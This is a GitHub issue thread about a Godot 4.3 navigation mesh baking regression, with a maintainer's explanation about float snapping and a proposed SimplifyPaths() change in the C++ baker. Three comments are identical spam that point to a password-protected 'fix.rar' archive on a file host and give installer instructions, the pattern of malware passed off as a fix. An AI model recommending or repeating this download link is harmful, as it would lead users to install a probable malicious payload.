### ISSUE TITLE
2D NavigationPolygon baked in editor produces Navigation map synchronization error in 4.3

### ISSUE THREAD

**Issue by rob1gat** [godotengine/godot#96123]
### Tested versions

- Reproducible in v4.3.stable.official [77dcf97d8]
- **NOT** reproducible in v4.2.1.stable.official [b09f793f5]

### System information

Godot v4.3.stable - Linux Mint 21.3 (Virginia) - X11 - Vulkan (Forward+) - dedicated AMD Radeon RX 6700 XT (RADV NAVI22) - 12th Gen Intel(R) Core(TM) i5-12400 (12 Threads)

### Issue description

On a simple project (see MRP), I have a NavigationRegion2D (with a simple rectangular outline) and 2 Polygons.

![navregion](https://github.com/user-attachments/assets/8736c8e7-a533-4267-8a63-a2744b88149b)

When I launch my scene, I get an error : 
```
E 0:00:00:0231   sync: Navigation map synchronization error. Attempted to merge a navigation mesh polygon edge with another already-merged edge. This is usually caused by crossing edges, overlapping polygons, or a mismatch of the NavigationMesh / NavigationPolygon baked 'cell_size' and navigation map 'cell_size'. If you're certain none of above is the case, change 'navigation/3d/merge_rasterizer_cell_scale' to 0.001.
  <Source C++>   modules/navigation/nav_map.cpp:990 @ sync()
```
`cell_size` values are equal and changing `navigation/3d/merge_rasterizer_cell_scale` to 0.001 has no effect.

Taking a closer look at the produced polygon, I can see this (I guess) problematic triangle : 
![edgeerror](https://github.com/user-attachments/assets/94c9ec68-f64b-41ad-8db3-83204015033c)

The thing is, when I open the same project in 4.2.1 and I rebake the navigation map, the produced polygon does not have this problematic triangle, and then I don't have the error. **Is it a regression ?**

### Steps to reproduce

* Open MRP
* Launch scene and look at output for the error

### Minimal reproduction project (MRP)

MRP : [mrp_navmapsynchroerror.zip](https://github.com/user-attachments/files/16751112/mrp_navmapsynchroerror.zip)

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by smix8** [comment]
Godot 4.2 forced position integer snapping, that was removed due to popular demand. In Godot 4.3 it allows to use floats and they can up and downscaled. So all the precision issues with certain layouts can now survive that would have been removed by the old integer snap. You need to snap or otherwise prevent those situations manually now.

**Comment by rob1gat** [comment]
Thanks for your answer. Could you tell me what settings I should modify to have integer snap ?

**Comment by smix8** [comment]
There is no direct setting but you can e.g. enable the editor snapping so that your positions are not running with some weird float numbers, that alone can help a lot.

**Comment by smix8** [comment]
To really fix this in scripts you would need to not only snap the vertices of the baked navmesh but also remove any "duplicates", and fix the polygon indices in turn if removed.

The reason why that tiny polygon that has rasterization issues even gets baked is because the general scale is tiny, that white "collision" shape has a lot of tiny small edges and the agent_radius bake size set to 7 is uneven so you end up with more issues to rasterize the resulting edges in the navigation map.

**Comment by rob1gat** [comment]
> To really fix this in scripts alone you would need to not only snap the vertices of the baked navmesh but also remove any "duplicates", and fix the polygon indices in turn if removed.

Are there any obstacles to adding this process to the navigation mesh baking ? Maybe performances ?

**Comment by rob1gat** [comment]
Looking at the code of `NavMeshGenerator2D::generator_bake_from_source_geometry_data()`, it seems that clipper `InflatePaths()` function is called ([line 957](https://github.com/godotengine/godot/blob/master/modules/navigation/2d/nav_mesh_generator_2d.cpp#L957)) but `path_solution` is not simplified then.

To quote clipper documentation (about `SimplifyPaths()` function): 
> This function is strongly recommended following [offsetting](http://www.angusj.com/clipper2/Docs/Units/Clipper/Functions/InflatePaths.htm) (ie inflating/shrinking), especially when offsetting paths multiple times. Offsetting often creates tiny segments that don't improve path quality.

I (humbly) believe that calling this method could prevent some tiny triangle issues. Moreover, it could improve baking performances since some boolean operations are then performed on `path_solution`.

What do you think about this ?

**Comment by smix8** [comment]
I remember I had some commented-out remnant code using the clipper simplification (RamadaDouglasClass or something back then) and while it worked for some cases it mess-upa lot of others so I removed it again. That was a while ago so if someone else wants to spend time on re-testing this be my guest.

**Comment by rob1gat** [comment]
I added a call to SimplifyPaths() after InflatePaths() : 
```cpp
if (agent_radius_offset > 0.0) {
    path_solution = InflatePaths(path_solution, -agent_radius_offset, JoinType::Miter, EndType::Polygon);
    path_solution = SimplifyPaths(path_solution, 1.0);
}
```
With this line of code, the error disappears on the MRP.

I have 2 questions : 
- `SimplifyPaths()` needs a `epsilon` parameter. On my test, I choose `epsilon = 1.0`, but I wonder what I could use as a more appropriate value. Do you think `cell_size` could do the job ?
- Where could I find some projects to test this change ?

**Comment by rob1gat** [comment]
Ok thanks, I tried the [nav_mesh_chunks project](https://github.com/godotengine/godot-demo-projects/tree/master/2d/navigation_mesh_chunks).

It seems that, when agent radius is equal to 11.0, I get the navigation synchronization error. The project behaves the same in 4.3 and with my modification.

Could you please tell me where I can find information about cell size ? What is it for ? Where is it used ?

**Comment by smix8** [comment]
The cell sizes is used by the navigation map to rasterize the navigation mesh edges by edge key in order to merge them. In 3D it is also used to define the voxel cell size for the baking.

**Comment by smix8** [comment]
Closing as I think this has been resolved.

**Comment by rob1gat** [comment]
I tested the MRP on 4.5.dev2 and **the problem is still here**, could you reopen this issue @smix8 ?
